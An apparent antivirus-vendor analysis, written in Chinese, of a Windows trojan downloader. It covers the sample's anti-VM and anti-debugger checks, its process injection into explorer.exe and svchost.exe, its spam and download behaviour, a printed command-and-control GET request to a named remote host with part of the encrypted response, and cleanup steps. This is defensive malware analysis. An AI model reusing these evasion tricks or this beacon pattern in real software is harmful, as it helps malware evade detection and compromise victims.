Trojan/Win32.Agent.cybs[Downloader]分析

病毒标签

病毒名称： Trojan/Win32.Agent.cybs[Downloader]
病毒类型： 木马
文件 MD5： 842D8084A262FC2F3BC6EF5B91B62FF4
公开范围： 完全公开
危害等级： 4
文件长度： 23,040 字节
感染系统： Windows98以上版本
开发工具： Borland Delphi 6.0 - 7.0

病毒描述

    该病毒为后门类木马，该病毒文件为木马下载器，病毒文件做了加密处理，运行后解密代码动态获取大量API函数，判断%System32\drivers\目录下是否存在hgfs.sys、prleth.sys、vmhgfs.sys驱动文件，其中hgfs.sys驱动文件为VMware Tools的驱动文件，如发现存在该驱动文件则调用函数结束线程使VMware虚拟机瞬间蓝屏，目的为了防止在VMware下运行该病毒文件而做的一种反调试手段，获取DBGHELP.DLL（Ollydbg调试器动态链接库文件）、sbieDll.dll（沙盘动态链接库文件） 句柄用来判断病毒文件是否为被调试状态，如发现为被调用试状态也会调用其他函数使其瞬间蓝屏，如不存在以上问题则查找含有"Shell_TrayWnd"类名的窗口，将病毒代码写入到EXPLORER.EXE进程中，创建远程线程，开启SVCHOST.EXE进程连接网络发送记录安装统计信息，并下载大量病毒文件、发送大量垃圾邮件。

行为分析-本地行为

1、病毒文件做了加密处理，运行后解密代码动态获取大量API函数，判断%System32\drivers\目录下是否存在hgfs.sys、prleth.sys、vmhgfs.sys驱动文件，hgfs.sys驱动文件为VMware Tools驱动文件，如发现存在该驱动文件则调用函数结束线程使VMware虚拟机瞬间蓝屏，目的为了防止在VMware下运行该病毒文件做的反调试的一种手段。

2、获取DBGHELP.DLL（Ollydbg调试器动态链接库文件）、sbieDll.dll（沙盘动态链接库文件） 句柄来判断病毒文件是否被调试状态如发现被调试状态也会调用函数使其瞬间蓝屏，如不存在以上问题则查找含有"Shell_TrayWnd"类名的窗口，将病毒代码写入到EXPLORER.EXE进程中，创建远程线程，开启SVCHOST.EXE进程连接网络发送记录安装统计信息，并下载大量病毒文件、发送大量垃圾邮件。

3、判断注册表键值是否存在以下字串：
HKLM\HARDWARE\Description\System\SystemBiosVersion下是否有一个VBOX的串值
55274-640-1532467-23148
如找到以上注册表值，病毒文件则会停止退出进程。

行为分析-网络行为

一旦病毒成功连接到作者服务器控制中心，就会发送一个GET请求
GET /new/controller.php?action=bot&entity_list=&first=0&rnd=981633&uid=1&guid=2560580763 HTTP/1.1
Host: yourarray.ru
服务器会返回一串加密的字串。这些加密的文件被写入到一个新的文件中，文件会被自动执行，创建的svhost进程并将病毒代码注入到该进程中连接网络发送记录安装统计信息，并下载大量病毒文件、发送大量垃圾邮件。

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 29 Jan 2010 04:28:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 139776
Entity-Info: 1259351490:94720:1;1259362390:32768:1;1260802348:12288:2;
Rnd: 982098
Magic-Number:
512|1|66:240:251:191:71:231:234:250:245:19:4:28:99:33:246:82:59:201:166:230:65:146:77:84:134:14:235:
91:154:94:183:221:78:179:156:149:154:135:144:144:154:149:172:253:182:162:79:241:108:246:216:173:137:
37:1:15:52:237:107:207:75:35:172:153:214:73:47:112:208:192:1:107:85:173:105:11:80:185:253:188:175:213:
105:56:251:107:72:47:88:179:254:163:215:171:61:173:244:109:30:197:45:32:48:131:205:154:142:29:83:140:
217:3:97:67:60:93:174:133:140:7:56:139:171:16:54:232:190:42:86:221:240:132:253:33:7:202:187:150:232:
15:34:194:18:132:5:79:225:180:212:110:187:13:249:102:29:48:79:219:91:166:185:75:42:182:108:50:129:40:
201:106:55:236:44:73:112:49:152:82:230:109:193:161:122:187:8:151:235:87:115:70:253:44:146:40:227:254:
91:101:38:36:207:94:16:252:167:129:46:64:212:20:173:149:181:40:81:190:191:60:21:51:131:19:96:22:60:67:
21:151:169:60:188:120:154:204:116:66:78:162:131:34:182:49:184:108:89:9:42:24:70:64:76:202:84:172:225:
144:239:246:40:152:50:228:17:204:177:134:15:255:40:146:34:223:195:219:76:28:229:119:52:44:183:128:247:
12:45:216:157:28:206:197:181:0:170:199:205:92:77:220:92:118:110:126:85:49:90:162:78:63:25:131:107:209:
3:98:221:49:58:122:77:9:64:3:10:235:203:215:71:24:180:163:142:35:34:228:84:124:134:163:188:160:38:39:
113:41:138:78:91:197:201:169:206:10:172:216:245:119:176:61:144:101:225:30:136:4:3:221:128:138:128:60:
42:166:100:155:208:239:234:43:180:180:212:131:190:129:92:180:248:13:242:137:114:211:168:250:215:171:
215:88:53:87:149:96:253:250:251:205:233:230:249:158:154:205:33:89:78:126:14:71:139:0:208:253:212:120:
248:171:36:207:4:90:39:153:186:37:147:182:243:125:157:236:27:56:185:60:146:8:187:160:79:70:160:32:68:
116:152:60:32:189:12:36:24:52:190:211:89:81:137:76:206:39:57:234:95:243:38:241:251:225:146:74:40:51:
106:108:168:3:169:200:193:182:237:217:234:171:172:67:252:54:144:203:93:202:181:189:189:220:174:184:190:65:3:231:

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。Windows2000/NT中默认的安装路径是C:\Winnt\System32，windows95/98/me中默认的安装路径是C:\Windows\System，windowsXP中默认的安装路径是C:\Windows\System32。
         %Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 当前用户TEMP缓存变量
         %Windir%\ 　　　　　　　　　 　WINDODWS所在目录
         %DriveLetter%\ 　　　　　　　　逻辑驱动器根目录
         %ProgramFiles%\ 　　　　　　　 系统程序默认安装目录
         %HomeDrive% = C:\ 　　　　　　 当前启动的系统的所在分区
         %Documents and Settings%\ 　　 当前用户文档根目录

清除方案

1、使用安天防线可彻底清除此病毒(推荐)，请点击下载(http://www.antiyfx.com)。
2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。
推荐使用ATool管理工具，请点击下载(http://www.antiyfx.com/download/atool.zip)。

（1）使用ATOOL进程管理结束病毒进程。

（2）强行删除病毒下载的大量病毒文件
%System32%\drivers\mskssrv.sys
%System32%\drivers\aec.sys
%System32%\drivers\aec.sys.bak
%System32%\drivers\mspclock.sys
%System32%\drivers\Cdaudio.sys
%System32%\drivers\Modem.sys
%System32%\drivers\SETE.tmp
%System32%\drivers\i2omgmt.sys
%System32%\drivers\Changer.sys
%System32%\drivers\SET14.tmp
%System32%\drivers\mspqm.sys
%System32%\drivers\RDPWD.sys
%System32%\drivers\lbrtfdc.sys
%System32%\drivers\SET18.tmp
%System32%\drivers\Sfloppy.sys
%System32%\drivers\TDPIPE.sys
%System32%\drivers\TDTCP.sys
%System32%\drivers\SET1C.tmp
%System32%\drivers\SET1E.tmp
%System32%\drivers\SET20.tmp
%System32%\drivers\SET1A.tmp
%System32%\drivers\SET22.tmp
%System32%\drivers\SET24.tmp
%System32%\drivers\SET26.tmp
%System32%\drivers\SET28.tmp
%System32%\drivers\SET2A.tmp
%System32%\drivers\SET2C.tmp
%System32%\drivers\SET2E.tmp
%System32%\drivers\SET30.tmp
%System32%\drivers\SET32.tmp
%System32%\drivers\SET34.tmp
%System32%\drivers\SET36.tmp
%System32%\drivers\SET38.tmp
%System32%\drivers\SET3A.tmp
%System32%\drivers\SET3C.tmp
%System32%\drivers\SET3E.tmp
%System32%\drivers\SET40.tmp
%System32%\drivers\SET42.tmp
%System32%\drivers\SET44.tmp
%System32%\drivers\SET46.tmp
%System32%\drivers\SET48.tmp
%System32%\drivers\SET4A.tmp
%System32%\drivers\SET4C.tmp
%System32%\drivers\SET4E.tmp
%System32%\drivers\SET50.tmp
%System32%\drivers\SET52.tmp
%System32%\drivers\SET54.tmp
%System32%\drivers\SET56.tmp
%System32%\drivers\SET58.tmp
%System32%\drivers\SET5A.tmp
%System32%\drivers\SET5C.tmp
%System32%\drivers\SET5E.tmp
%System32%\drivers\SET60.tmp
%System32%\drivers\SET62.tmp
%System32%\drivers\SET64.tmp
%System32%\drivers\SET66.tmp
%System32%\drivers\SET68.tmp
%System32%\drivers\SET6A.tmp